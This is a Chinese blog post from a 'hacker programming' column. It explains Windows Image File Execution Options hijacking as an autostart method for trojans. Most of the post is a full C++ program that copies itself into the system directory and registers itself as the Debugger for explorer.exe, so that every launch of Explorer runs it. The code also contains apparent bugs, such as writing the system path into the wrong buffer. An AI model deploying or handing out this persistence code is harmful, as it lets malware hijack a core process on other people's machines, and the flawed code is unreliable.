安全之路 —— 通过映像劫持实现文件自启动

最新推荐文章于 2023-05-08 15:25:19 发布
最新推荐文章于 2023-05-08 15:25:19 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: c/c++ Windows编程 文章标签: C/C++ Windows编程 映像劫持 黑客编程 自启动
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/PeterZ1997/article/details/80216625
版权

简介

Windows映像劫持技术是微软提供给软件开发者调试使用的在注册表项,能够替换目标进程执行。但如果被病毒木马利用,便会成为触发式自启动的绝佳方式,所以修改映像劫持的操作行为也被反病毒软件列为极其危险的行为之一。

  • 实现映像劫持修改的注册表项为:
  1. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options

在项下添加新的子键,名为替代启动的目标进程名,例如“cmd.exe”,然后创建新的值项为“Debugger”,值为新的进程路径。

C++代码样例

////////////////////////////////////////////////
//
// FileName : ifeoDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-5 18:44
// Comment : Image File Hijacking Demo
//
////////////////////////////////////////////////

#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <windows.h>

using namespace std;

const unsigned int MAX_COUNT = 255;
BOOL g_fileExistFlag = false;

/**
 * @brief 封装字符型注册表操作
 * @param hRoot root key
 * @param szSubKey sub key after the root key
 * @param szValueName key name
 * @param szData key Data
 * @return Boollean Value
 */
BOOL setStringValueToReg(HKEY hRoot, const char* szSubKey, const char* szValueName, const char* szValue)
{
    HKEY hKey;
    long lRet;
    if (lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL)) return false;
    if (lRet = RegSetValueEx(hKey, szValueName, 0, REG_SZ, (BYTE*)szValue, strlen(szValue))) return false;
    RegCloseKey(hKey);
    RegCloseKey(hRoot);
    return true;
}

/**
 * @brief Main Function
 */
int APIENTRY WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    CHAR szSystemFilePath[MAX_COUNT] = "\0";
    CHAR szSelfFilePath[MAX_COUNT] = "\0";
    CHAR szExplorerPath[MAX_COUNT] = "\0";
    GetSystemDirectory(szSelfFilePath, sizeof(szSystemFilePath));
    strcat_s(szExplorerPath, sizeof(szExplorerPath), "C:\\Windows\\explorer.exe");
    strcat_s(szSystemFilePath, sizeof(szSystemFilePath), "\\sysWork.exe");
    GetModuleFileName(NULL, szSelfFilePath, sizeof(szSelfFilePath));
    if (!CopyFile(szSelfFilePath, szSystemFilePath, true))
    {
        setStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", "Debugger", "");
        WinExec(szExplorerPath, SW_SHOW);
    }
    setStringValueToReg(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", "Debugger", szSystemFilePath);
    MessageBox(NULL, "HelloWorld", "Tips", MB_OK);
    ExitProcess(0);
    return 0;
}
雨者
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过bin文件形式实现EBOOT的读取、LOGO
01-19
BOOTLOADER的主要作用是将操作系统运行时映像加载到内存,并跳转到OS的启动程序处。它的这一作用跟前一篇介绍的NBOOT的作用完全一致。BOOTLOADER获取运行时映像(一般对应的文件名为NK)一般有两种方法。它可以通过...
关于CMD的劫持
weixin_34397291的博客
07-26 567
今天中了一个病毒,发现了这个问题,每次打开cmd的时候自动运行一个程序: 注册表位置: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]"AutoRun"="regedit.exe" 如上,每次运行cmd的同时就会打开注册表! 病...
关于映像劫持
weixin_46661122的博客
11-30 6127
什么是映像劫持? “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助机制等。出于简化原因,IFEO使用忽略路径的方式
映像劫持技术(1):简单介绍
weixin_30449453的博客
01-01 198
映像劫持,即Image File Execution Option.在深入了解这个概念之前,可以简单地认为,它可以令应用程度重定向。这是注册表里的一个功能,可以做这样的尝试: 打开注册表——定位到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options...
映像劫持技术
whl0071的专栏
04-28 591
映像劫持技术
映像劫持 Image Hijack
KAKA的博客
07-06 1044
映像劫持” —— IFEO(Image File Execution Options:映像文件执行参数),其实应该被称为 “Image Hijack” 原理 原理请看 tombkeeper 的所表: Windows NT系统在执行一个从命令行调用的可执行文件运行请求时,首先会检查这是否是一个可执行文件,如果是,又是什么格式的,然后就会检查是否存在: [HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Option
TIA PORTAL V18面板映像文件-链接地址.txt
11-25
TIA PORTAL V18面板映像文件_链接地址
C++实现映像劫持
09-08
基于C++实现映像劫持。 通过更改注册表实现文件的打开方式的锁定更改。
MFC程序的注册表编程(自启动映像劫持文件关联)-C++文档类资源
04-20
这学期考研要看书所以没时间编程,今日手痒逞周末时间研究了一下注册表编程,通过自启动映像劫持文件关联三个功能及其恢复功能基本熟悉了注册表编程的大部分内容,以后做什么邪恶的东东肯定做得到~
注册表映像劫持的查看
03-26
用来检查系统有无异常的映像劫持
映像劫持修复工具)
03-21
映像劫持修复工具映像劫持修复工具映像劫持修复工具映像劫持修复工具
windows映像劫持技术(IFEO)
04-08
一,什么是映像劫持(IFEO)? 二,具体使用资料: 三,映像劫持的基本原理: 四,映像胁持的具体案例: 五:如何解决并防范“映像劫持”?
解除映像劫持工具.exe
02-21
解除映像劫持工具可解决因映像劫持导致的程序不能运行问题 显示在红色列表框中为被劫持导致无法运行的程序名(同名程序不能在本机器上正常运行,可通过加号增加对其它程序文件的屏蔽) 显示在绿色列表框中为本...
SIMATIC WINCC面板映像文件_V17_链接地址.txt
07-20
SIMATIC WINCC面板映像文件_V17_链接地址
安全技巧:映像劫持与反劫持技术
zhangmiaoping23的专栏
01-14 1484
<br />IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定,系统厂商之所以会这么做,是有一定历史原因的,在Windows NT时代,系统使用一种早期的堆栈Heap,由应用程序管理的内存区域)管理机制,使得一些程序的运行机制与现在的不同,而后随着系统更新换代,厂商修改了系统的堆栈管理机制,通过引入动态内存分配方案,让程序对内存的占用更为减少,在安全上也保护程序不容易被溢出,但是这些改动却导致了一些程序从此再也无法运作,为了兼顾这些出问题的程序,微软以“从长计议”的态度专
木马启动之映像劫持
COSMOSJie的博客
05-08 325
木马运行的原理其实很简单
C#实现映像劫持
diaohuofu0847的博客
12-25 359
映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入...
映像劫持windows服务启动的两种形式
onlyfunboy的专栏
06-17 1632
1 服务控制管理器(services.exe) 1.1 dll类型的服务 该类型的服务,可以通过svchost.exe通过命令行的方式启动。ZwCreateThreadEx函数是比CreateRemoteThread更底层的函数,可以注入dll到服务程序中。ZwCreateThreadEx函数没有在ntdll.dll中声明,所以需要使用GetProcAddress从ntdll.dll中获取该函数的导出地址。 以上几个服务启动的命令行如下: C:\Windows\System32\svchost.
u盘启动pe还原tib映像文件
最新发布
07-27
U盘启动PE可以用来启动计算机,以便进行系统维护和恢复操作。TIB映像文件是由Acronis True Image创建的系统备份文件,它包含了整个系统的完整镜像。下面是使用U盘启动PE还原TIB映像文件的步骤: 1.准备一个空的U盘,确保其容量足够存储TIB映像文件和PE工具。 2.下载一个适合的PE启动工具,例如EasyUEFI或Rufus等,将其安装在本地计算机上。 3.用选定的PE启动工具创建一个可启动的U盘。这个步骤可能会涉及选择一个PE映像文件(ISO文件)和指定U盘的分区格式。 4.将TIB映像文件复制到U盘的根目录下。确保复制过程顺利完成。 5.将U盘插入需要还原的计算机的USB接口中。 6.将需要还原的计算机重启,并进入BIOS设置界面。 7.在BIOS设置界面中,将U盘设置为首选启动设备。保存设置并退出。 8.计算机重新启动后,系统将从U盘中的PE工具启动。 9.在PE环境中,找到并打开Acronis True Image软件。 10.在Acronis True Image界面中,选择“还原”功能,并浏览到U盘的根目录找到需要还原的TIB映像文件。 11.选择恢复选项,如目标磁盘、目标分区等。 12.点击“开始”按钮开始还原操作。请谨慎选择还原目标,以免损坏数据。 13.等待还原过程完成,这可能需要一段时间,取决于TIB映像文件的大小和计算机性能。 14.还原完成后,从U盘中拔出U盘,并重启计算机。 15.计算机重新启动后,将进入恢复后的系统。 这是使用U盘启动PE还原TIB映像文件的步骤。请注意,操作系统、PE工具和Acronis True Image软件的版本可能会有所不同,具体步骤可能会略有差异。在操作过程中,请确保备份重要数据,并小心操作,以免造成数据丢失或系统损坏。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值